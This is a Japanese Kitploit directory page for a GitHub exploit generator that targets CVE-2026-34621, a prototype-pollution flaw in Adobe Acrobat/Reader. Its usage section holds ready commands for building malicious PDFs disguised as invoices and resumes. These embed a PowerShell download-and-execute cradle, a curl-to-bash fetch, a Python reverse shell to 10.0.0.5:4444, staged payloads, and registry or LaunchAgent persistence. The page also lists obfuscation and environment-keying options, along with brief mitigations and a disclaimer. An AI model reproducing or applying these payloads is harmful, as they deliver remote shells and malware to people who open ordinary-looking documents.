Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve_2026_34621_advanced — 高度なクロスプラットフォーム対応のエクスプロイトジェネレーター **CVE-2026-34621** 用 – Adobe Acrobat および Reader における重大なプロトタイプ汚染の脆弱性で、Windows と macOS 上でサンドボックスエスケープと任意のコード実行につながります。 | Kitploit
ツール/GitHubGitHub/null200ok/cve_2026_34621_advanced
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

高度なクロスプラットフォーム対応のエクスプロイトジェネレーター **CVE-2026-34621** 用 – Adobe Acrobat および Reader における重大なプロトタイプ汚染の脆弱性で、Windows と macOS 上でサンドボックスエスケープと任意のコード実行につながります。

リポジトリを見る
1354ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-34621 高度エクスプロイトジェネレーター

Python 3.7+ License

CVE-2026-34621 向けの高度なクロスプラットフォームエクスプロイトジェネレーターです。これはAdobe AcrobatおよびReaderにおける重大なプロトタイプ汚染(prototype pollution)の脆弱性であり、WindowsおよびmacOS上でのサンドボックスエスケープと任意のコード実行につながります。

⚠️ 重要なお知らせ
このツールは認可されたセキュリティ研究およびペネトレーションテストのみを目的としています。
所有していない、または明示的な書面によるテスト許可を得ていないシステムに対する不正使用は違法です。作者は誤用に対する一切の責任を負いません。


📋 目次

  • 概要
  • 機能
  • インストール
  • クイックスタート
  • 使用例
    • Windowsコマンド
    • macOSコマンド
    • モバイルテスト
  • コマンドラインオプション
  • 動作の仕組み
  • 影響を受けるバージョン
  • 緩和策
  • 貢献
  • ライセンス

🔍 概要

CVE-2026-34621 はAdobe AcrobatおよびReaderにおけるゼロデイ脆弱性であり、攻撃者が以下を実行できるようにします:

  1. Adobeのエンジン内でJavaScriptオブジェクトのプロトタイプを汚染する。
  2. セキュリティサンドボックスをバイパスする。
  3. 被害者のマシン上で任意のシステムコマンドを実行する。

このジェネレーターは、脆弱性のあるバージョンのAdobe Readerで開かれると、被害者のオペレーティングシステムに合わせたペイロードを自動的に実行する悪意のあるPDFファイルを作成します。

対応ターゲットプラットフォーム:

  • ✅ Windows(完全な任意コード実行)
  • ✅ macOS(完全な任意コード実行)
  • ❌ Android / iOS(脆弱性なし – デモ用フォールバックのみ)

✨ 機能

カテゴリ機能
クロスプラットフォームペイロードOSを自動検出し、適切なWindowsまたはmacOSのコマンド実行方法を選択します。
複数の実行ベクターcmd.exe、PowerShell、WScript.Shell(Windows)/ Terminal.app、osascript(macOS)。
ステージ型ペイロードリモートURLからセカンドステージペイロードをダウンロードして実行します。
永続化レジストリのRunキー(Windows)またはLaunchAgent(macOS)をインストールします。
回避技術3レベルのJavaScript難読化、環境キーイング、実行遅延、ポリモーフィックコード。
ルアーPDF埋め込み正当なPDFにエクスプロイトをマージします(PyPDF2が必要)。
複数のトリガーOpenAction、ページオープンアクション、またはドキュメントレベルのJavaScript。
包括的なレポートペイロード設定を詳述するHTML、TXT、JSONレポート。

📦 インストール

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (任意)仮想環境の作成

root@kitploit:~
python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. 依存関係のインストール

コアスクリプトはPython標準ライブラリのみを使用します。ルアーPDFマージ機能にはPyPDF2をインストールしてください:

root@kitploit:~
pip install PyPDF2

🚀 クイックスタート

WindowsとmacOSの両方で電卓を開く基本的なPDFを生成します:

root@kitploit:~
python3 cve_2026_34621_advanced.py -o test.pdf

これにより以下が作成されます:

test.pdf – 悪意のあるPDFファイル。

test_report.html – 詳細なHTMLレポート。

test_report.txt – プレーンテキストの要約。

test_config.json – JSON設定のエクスポート。

💻 使用例

Windowsコマンド

1-シナリオ コマンド

A-基本的なcalc.exeポップアップ

root@kitploit:~
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

PowerShellリバースシェル

root@kitploit:~
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

永続化付きステージ型ペイロード

root@kitploit:~
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

環境キーイング(「SALES-PC」でのみ実行)

root@kitploit:~
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

難読化レベル2と10秒の遅延付き

root@kitploit:~
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

macOSコマンド

2-シナリオ コマンド

電卓を開く

root@kitploit:~
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

スクリプトのダウンロードと実行

root@kitploit:~
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Pythonによるリバースシェル

root@kitploit:~
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

LaunchAgentによる永続化

root@kitploit:~
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

ルアーPDFへの埋め込み

root@kitploit:~
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-モバイルテストに関する注意

スクリプト自体はデスクトップ(Windows/macOS/Linux)上で実行され、PDFを生成します。生成されたPDFはAndroidまたはiOSデバイスで開くことができますが、以下の点に注意してください:

モバイル版のAdobe Acrobat ReaderはCVE-2026-34621の影響を受けません。

ペイロードはシステムコマンドを実行する代わりに、無害なデモ用フォールバック(URLを開くかアラートを表示)をトリガーします。

📖 コマンドラインオプション

オプション 説明

-o, --output FILE 必須。出力PDFファイル名。

--win CMD 実行するWindowsコマンド(デフォルト:calc.exe)。

--mac CMD 実行するmacOSコマンド(デフォルト:open /System/Applications/Calculator.app)。

--stage URL セカンドステージペイロードをダウンロードするURL。

-p, --persistence 永続化メカニズム(レジストリ/LanchAgent)をインストールします。

-O, --obfuscate LEVEL JavaScript難読化レベル(0=なし、1=基本、2=中級、3=上級)。

-d, --delay SECONDS 指定した秒数だけ実行を遅延します。

-k, --key HOSTNAME 環境キーイング – 一致するホスト名でのみ実行します。

-l, --lure PDF ルアーとして使用する正当なPDFへのパス(エクスプロイトをマージします)。

--trigger TYPE トリガーベクター:openaction、pageopen、またはdoclevel。

--no-reports HTML/TXT/JSONレポートの生成をスキップします。

--seed N 再現可能なポリモーフィック生成のための乱数シードを設定します。

⚙️ 動作の仕組み

攻撃チェーン

プロトタイプ汚染:

埋め込まれたJavaScriptはObject.prototypeを変更して悪意のあるプロパティ(__trusted、privilegedなど)を注入します。これによりAdobeのJavaScriptエンジンの信頼境界が混乱します。

コンテキスト昇格

汚染されたプロトタイプにより、エンジンは信頼されていないドキュメントJavaScriptを特権コンテキストで実行されているかのように誤って扱います。

特権APIアクセス

スクリプトはapp.launchURL、util.readFileIntoStream、app.trustedFunctionなどの制限付きAPIを呼び出せるようになります。

サンドボックスエスケープ

これらのAPIにより、Adobeサンドボックスの外部でのファイルシステムアクセスとプロセス実行が可能になります。

任意コード実行

スクリプトはOS固有の方法を使用して攻撃者のコマンドを実行します:

Windows:cmd.exe /c、PowerShell、またはWScript.Shell。

macOS:Terminal.app URLハンドラーまたはosascript。

難読化レベル

レベル 説明

0 難読化なし – プレーンで読み取り可能なJavaScript。

1 文字列リテラルがString.fromCharCodeに変換され、変数名がランダム化されます。

2 レベル1 + デッドコードの注入とジャンクコメント。

3 スクリプト全体がbase64エンコードされ、eval(atob(...))でラップされた後、再難読化されます。

🛡️ 影響を受けるバージョン

製品 トラック 影響を受けるバージョン 修正済みバージョン

Adobe Acrobat DC 継続 ≤ 26.001.21367 26.001.21411

Adobe Acrobat Reader DC 継続 ≤ 26.001.21367 26.001.21411

Adobe Acrobat 2024 クラシック ≤ 24.001.30356 24.001.30362(Win)/ 24.001.30360(macOS)

🛠️ 緩和策

すぐに更新する:Adobeから最新のセキュリティアップデートを適用してください。

Adobe ReaderでJavaScriptを無効にする:編集 → 環境設定 → JavaScript → 「Acrobat JavaScriptを使用」のチェックを外します(注:一部のPDF機能が使用できなくなります)。

代替PDFビューアを使用する:影響を受けないブラウザやサードパーティ製ビューアの使用を検討してください。

🤝 貢献

貢献は歓迎しますが、以下の点にご注意ください:

すべてのプルリクエストは、防御的研究、検出の改善、またはレポート機能の強化を目的としたものでなければなりません。

正当なテストに必要な範囲を超えてツールの攻撃能力を高める貢献は受け付けません。

貢献するには:

リポジトリをフォークします。

機能ブランチを作成します。

変更内容を明確に説明したプルリクエストを送信します。

📄 ライセンス

このプロジェクトは教育目的および認可されたセキュリティテスト目的でのみ提供されます。

本ソフトウェアを使用することにより、お客様は適用されるすべての法律および規制を遵守する責任があることに同意したものとみなされます。

作者は、このツールの誤用または損害に対する一切の責任を否認します。

ツールをダウンロード